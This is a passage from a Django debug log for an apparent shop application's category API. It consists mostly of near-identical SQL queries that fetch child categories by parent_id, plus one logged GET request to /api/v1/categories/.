"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-03 16:37:30,640 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-03 16:37:30,645 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-03 16:37:30,649 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-03 16:37:30,653 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-03 16:37:30,656 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-03 16:37:30,658 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-03 16:37:30,662 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-03 16:37:30,666 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-03 16:37:30,669 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-03 16:37:30,672 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-03 16:37:30,675 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-03 16:37:30,679 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-03 16:37:30,682 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-03 16:37:30,685 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-03 16:37:30,687 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-03 16:37:30,690 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-03 16:37:30,695 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-03 16:37:30,698 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-03 16:37:30,701 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-03 16:37:30,704 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-03 16:37:30,706 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-03 16:37:30,709 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-03 16:37:30,713 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-03 16:37:30,716 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-03 16:37:30,719 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-03 16:37:30,722 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-03 16:37:30,724 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-03 16:37:30,728 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-03 16:37:30,731 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-03 16:37:30,734 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-03 16:37:30,736 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-03 16:37:30,739 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-03 16:37:30,744 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-03 16:37:30,746 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-03 16:37:30,749 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-03 16:37:30,752 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-03 16:37:30,755 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-03 16:37:30,758 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-03 16:37:30,761 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-03 16:37:30,764 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-03 16:37:30,767 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-03 16:37:30,770 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-03 16:37:30,773 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [03/Jan/2020 16:37:30] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2020-01-03 16:37:34,322 utils 27361 140408453592832 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-03 16:37:34,329 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-03 16:37:34,334 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-03 16:37:34,338 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-03 16:37:34,342 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-03 16:37:34,345 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-03 16:37:34,348 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-03 16:37:34,350 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-03 16:37:34,353 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-03 16:37:34,357 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-03 16:37:34,359 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-03 16:37:34,362 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-03 16:37:34,365 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-03 16:37:34,368 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-03 16:37:34,371 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-03 16:37:34,374 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-03 16:37:34,377 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-03 16:37:34,379 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-03 16:37:34,382 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-03 16:37:34,386 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-03 16:37:34,389 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-03 16:37:34,391 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-03 16:37:34,394 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-03 16:37:34,396 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) 